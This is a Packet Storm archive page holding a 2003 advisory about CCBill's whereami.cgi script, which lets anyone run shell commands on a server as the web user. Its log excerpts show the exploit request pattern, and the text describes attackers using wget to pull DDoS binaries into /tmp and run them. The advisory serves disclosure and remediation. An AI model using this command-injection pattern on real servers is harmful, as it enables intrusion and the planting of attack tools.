exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ccbill.txt

ccbill.txt
Posted Jul 6, 2003
Authored by Dayne Jordan

The CGI script whereami.cgi that gets distributed by CCBill lacks input validation and in return allows for remote command execution as the web uid.

tags | exploit, remote, web, cgi
SHA-256 | ce15f8d74362f11898352d1bbf86d0330e48248dd00ae31bec0febbb7a67da0c

ccbill.txt

Change Mirror Download
Date: Thu, 03 Jul 2003 12:46:39 -0400
From: Dayne Jordan <djordan@completeweb.net>
Subject: Another overflow exploit for Apache? *RESOLVED*

Greetings again,

We found that this exploit was NOT a result of an Apache exploit.

After waiting for the culprits to attempt their mischeif again, we were
waiting and watched as they re-uploaded their rogue Ddos scripts to /tmp
and executed thru Apache - not to our surprise, it appears CCBILL once
again has some very exploitable 'helper' scripts they upload when installing
their software.

On ALL the machines with the Ddos behavior we found, there was one common
script on all of them ' whereami.cgi '. This script, when executed from
the browser allows system commands to be entered and executed as the web
server. We even used wget and lynx thru this command interface to upload
various things into /tmp/. Our culprits were uploading old-school and common
Ddos binaries, then executing them.. nothing root worthy, but nonetheless
a pain in the arse.

Excerpt log entries from our test machines:

Machine getting it - how we uploaded a test binary:
216.226.xxx.xxx - - [03/Jul/2003:12:00:00 -0400] "POST /ccbill/whereami.cgi?g=ls
HTTP/1.1" 200 1033 "http://our.test.fileserver/ccbill/whereami.cgi?g=ls"
"Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; H010818; T312461)"

Machine serving it:
216.226.xxx.xxx - - [03/Jul/2003:11:59:59 -0400] "GET /rogue-test.tar HTTP/1.0"
200 286720 "-" "Wget/1.5.1"

Other things we did with it:
216.226.xxx.xxx - - [03/Jul/2003:12:44:41 -0400] "GET
/ccbill/whereami.cgi?g=mkdir%20/tmp/boo
HTTP/1.1" 200 247 "-" "Mozilla/4.0
(compatible; MSIE 5.5; Windows 98; H010818; T312461)"

and then...

su-2.02# ls -la /tmp
drwxrwxrwt 6 root wheel 3072 Jul 3 12:42 .
drwxr-xr-x 19 root wheel 512 Mar 17 17:01 ..
drwxr-xr-x 2 nobody wheel 512 Jul 3 12:44 boo
srwxrwxrwx 1 mysql wheel 0 Jul 3 00:05 mysql.sock
[snipped]

And snippet from one of the affected machines running 'hell' a simple
Ddos binary:
172.157.111.201 - - [01/Jul/2003:16:58:20 -0400] "GET /ccbill/whereami.cgi?g=v/hell
HTTP/1.1" 200 265 "-" "Mozilla/4.0

Once you initiate the /whereami.cgi?g=ls command from the browser, you then
get an input box and an enter button on your browser - execute any command
you like, including wget, lynx, tar, sh, etc etc.

This script is most likely used by CCBILL techs as part of their default
installation so that they can administer/setup their necessary scripts/software. Unfortunately,
there is a huge hole in this script. We have a customer who very
recently had CCBILL setup their services on his website and the very same
'whereami.cgi' exists even on this current date build.

So in short, those of you who use CCBILL make sure to remove or render
useless the 'whereami.cgi' script in your /ccbill directory(ies). Across
all our machines where we know CCBILL exists we've found this script on
every one so far - and removed it ;)

D.
=========


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close